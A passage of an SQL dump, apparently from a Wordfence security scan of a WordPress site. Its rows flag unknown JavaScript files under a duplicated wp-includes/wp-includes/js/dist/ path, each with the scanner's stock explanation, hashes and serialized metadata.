tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/escape-html.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77568,1675048836,1675048836,'new','knownfile',75,'df40eae986baa2ce1c80c5b75c435455','43bad9056921b810c0c6483fed0df6ce','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/format-library.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/format-library.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77569,1675048836,1675048836,'new','knownfile',75,'0f343f364e804ea9d50a255e791e761c','69df92e1f81948d0a8bfb58796005430','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/format-library.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/format-library.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77570,1675048837,1675048837,'new','knownfile',75,'1ed6534e29854b9fb6efceed49aa5eea','1dfe1bc878405acf368f4a5efb4a8d62','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/hooks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/dist/hooks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77571,1675048837,1675048837,'new','knownfile',75,'68e25ef6023bbca1a93470bc44e81e18','5006dc9e2ac421e5efaf20a7f20d1b70','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/hooks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/hooks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77572,1675048837,1675048837,'new','knownfile',75,'15d198638ab13c648b87ff21988c17ee','19c492e92491ad09375407fa54435814','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/html-entities.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/html-entities.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77573,1675048837,1675048837,'new','knownfile',75,'7140fd5ed0885985866e35e4f78ead8e','b3c5acef3e97d7ff0f2c2955a0fd8cff','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/html-entities.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/html-entities.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77574,1675048837,1675048837,'new','knownfile',75,'abd7132e0c28c01894c4c67ca1edc1a9','0990d368c5b8444552e276f4cc8e684b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/i18n.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/i18n.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77575,1675048837,1675048837,'new','knownfile',75,'0f5342a406a60a77284d33860fed4e22','ff20822a5ab7d1ba9c872269e8994fd8','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/i18n.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/i18n.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77576,1675048837,1675048837,'new','knownfile',75,'947009cd44d1aefbf324f822e83bbcfc','1ff4a31ca218935f4d2d1900a61f2707','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/is-shallow-equal.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/is-shallow-equal.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77577,1675048837,1675048837,'new','knownfile',75,'5e21509d1417833c33fab48d4e0e8652','7fca0aaf45d9db4c7b6c7f74f0356596','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/is-shallow-equal.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/is-shallow-equal.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77578,1675048837,1675048837,'new','knownfile',75,'eebf7e1f7faa8281dc343d5ad9c90818','b0ecd16e73001044deeab0b53367863c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keyboard-shortcuts.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/keyboard-shortcuts.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77579,1675048837,1675048837,'new','knownfile',75,'2059f465c84b0268289ab4a9a6ecd775','9d7c49060fc39b36860638248fe8627b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77580,1675048837,1675048837,'new','knownfile',75,'64e5c0dec8dd9f7530f3ca321dfb3d07','cdbb24f6bac58cdb3c758b3cd971bc9f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keycodes.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/keycodes.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77581,1675048837,1675048837,'new','knownfile',75,'aab956ef67359794322931a6261c55f9','8ce46aead738c5835936db0384d6c0cb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keycodes.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/keycodes.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77582,1675048837,1675048837,'new','knownfile',75,'9c92ec3aedb7eac86a74536e0083f1f7','de9bfecd6139d79abac14944ab1cee40','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/list-reusable-blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/list-reusable-blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77583,1675048837,1675048837,'new','knownfile',75,'fd662f90b4a96b65b1b7a8ccc7f83dde','2d733c73787d4d294123ac5690ccfcfb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77584,1675048837,1675048837,'new','knownfile',75,'de92c1df4f71cc86ad47d46738d69d2f','2836720a7835b6759727c4c15a39e779','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/media-utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/media-utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77585,1675048837,1675048837,'new','knownfile',75,'f932d202aba4273528721a59f9058347','59696e54b1ac16874250d06ddcf11673','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/media-utils.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/media-utils.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77586,1675048837,1675048837,'new','knownfile',75,'d2ee274fa7bad3b499601542788caa9f','4874470551b723f2cea8b5268e925975','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/notices.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/notices.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77587,1675048837,1675048837,'new','knownfile',75,'c61ea5bd4cea7d743960fa42dc5bdca8','f8ef6d4e869ea4bf9fb16b719ae9a200','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/notices.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/notices.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77588,1675048837,1675048837,'new','knownfile',75,'1daa14257dd08f2c6832282c3ec35d97','fd6c253b0979c5db1aa7923ae3b3c653','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/nux.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/nux.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77589,1675048837,1675048837,'new','knownfile',75,'9ff9ff5e0d668524b35f3ac2f0fc8152','7034447f82fe8adb327d9a76bf63f695','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/nux.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/nux.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77590,1675048838,1675048838,'new','knownfile',75,'3a2eb4e8a7642ae7d7dd45d6763792ac','44793fb1c5ee99dd95f74867db06bd8d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/plugins.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/plugins.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77591,1675048838,1675048838,'new','knownfile',75,'82a351ed761abd7d2cd1512baa5f5aef','1043f5eee4e0d0806389ac13604b1136','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/plugins.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/plugins.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77592,1675048838,1675048838,'new','knownfile',75,'d65595d2ad50f9ba0f78cc20da410d6e','d9c9f0395c3f10dc505eb2692036e860','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/primitives.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/primitives.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77593,1675048838,1675048838,'new','knownfile',75,'6ca2308769a3361be368a697773d3b14','9dd9bd9b16e14df40b857b72913976be','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/primitives.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/primitives.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77594,1675048838,1675048838,'new','knownfile',75,'30ed3203f79a70192baadfa88681d6b0','c2bb6e960abadf0d24785b8542b45633','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/priority-queue.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/priority-queue.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77595,1675048838,1675048838,'new','knownfile',75,'6be93f906364470ff9bbd0c872d76ac1','35c2aa9cf44f0ed2bf55fd1f84400c5c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/priority-queue.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/priority-queue.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77596,1675048838,1675048838,'new','knownfile',75,'a725f99ecefd222b39c2ebb35609560d','86a82d47263771b99e75b129af3b76b0','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/redux-routine.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/redux-routine.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77597,1675048838,1675048838,'new','knownfile',75,'ea3fdaaadcfed56639be293fcf79a6bb','531b9537f43617ee23a51a05e6f58bae','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/redux-routine.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/redux-routine.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77598,1675048838,1675048838,'new','knownfile',75,'b9f864d97fabf238ca53a5a1eb68db21','a0b46206d2527640fa4d348fbf791b57','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/reusable-blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/reusable-blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77599,1675048838,1675048838,'new','knownfile',75,'94d3fa5682b87747da8b7b1113cf87f6','aba8412861c2fa1e9e53dd6f5f45e13c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/reusable-blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/dist/reusable-blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77600,1675048838,1675048838,'new','knownfile',75,'ecfa77a69858f2fffd35a8d2ca436333','f118670be968714762d073857d01e949','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/rich-text.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/rich-text.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77601,1675048838,1675048838,'new','knownfile',75,'c56953c66c8a194aa0a0fc533af73977','e5d98b82e12377fbe45e10539a09bbdc','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/rich-text.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/rich-text.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77602,1675048838,1675048838,'new','knownfile',75,'1f80a3683c70a74c9907a7918fde463b','d8d834c4031ba8dc4df6a8f1d13b296b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/server-side-render.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/server-side-render.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77603,1675048839,1675048839,'new','knownfile',75,'8bc2b0773ab72469062ab7ebfb7462d7','1228aa1dccb58cbc7d548267e51998aa','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/server-side-render.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/server-side-render.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77604,1675048839,1675048839,'new','knownfile',75,'1747900cc6d163269e6a4a9eb489f2f1','466c2e7753d478ae2e85b0b40c661a73','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/shortcode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/shortcode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77605,1675048839,1675048839,'new','knownfile',75,'4d1bb52d928262a8d807a850caa8252d','428961b0823b9d8d192284e060486cef','Unknown file in WordPress core: 